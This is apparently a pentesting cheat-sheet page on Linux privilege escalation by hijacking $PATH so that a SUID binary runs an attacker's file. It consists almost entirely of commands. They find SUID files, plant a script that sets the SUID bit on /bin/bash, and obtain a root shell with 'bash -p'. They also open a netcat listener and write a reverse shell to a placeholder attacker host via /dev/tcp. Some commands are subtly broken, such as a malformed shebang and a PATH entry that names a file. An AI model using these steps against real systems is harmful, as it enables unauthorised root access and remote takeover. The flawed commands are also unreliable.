Comment on page
Path Hijacking
Some examples to execute SUID files and replace in $PATH
Find some SUID files
find \ -perm -4000 2>/dev/null
touch hijacked_file
chmod 777 hijacked_file
To give SUID privileges to any file, binary, in this case /bin/bash
echo
nano
vim
echo "#/bin/bash" > hijacked_file
echo "chmod 4755" >> hijacked_file
nano <same_file_name_with_suid>
#/bin/bash
chmod 4755 /bin/bash
vim <same_file_name_with_suid>
#/bin/bash
chmod 4755 /bin/bash
Add the new path in the actual path
echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin
export PATH=/home/example/<same_file_name_with_suid>:$PATH # $PATH contain the actual PATH
echo $PATH
/home/example/<same_file_name_with_suid>:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin
echo "****** Execute again the SUID file *******"
Now just in terminal type
bash -p # To execute bash with the actual privileges
In the attack machine we are going to listen to any port
nc -lnvp 443
Now create a file with a connection to the attacker lhost and port 443
echo "/bin/bash -c 'bash -i >& /dev/tcp/<attackerlhost>/443 0>&1'" > <same_file_name_with_suid>
Add the new path in the actual path
echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin
export PATH=/home/example/<same_file_name_with_suid>:$PATH # $PATH contain the actual PATH
echo $PATH
/home/example/<same_file_name_with_suid>:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin
echo "****** Execute again the SUID file *******"
Last modified 4mo ago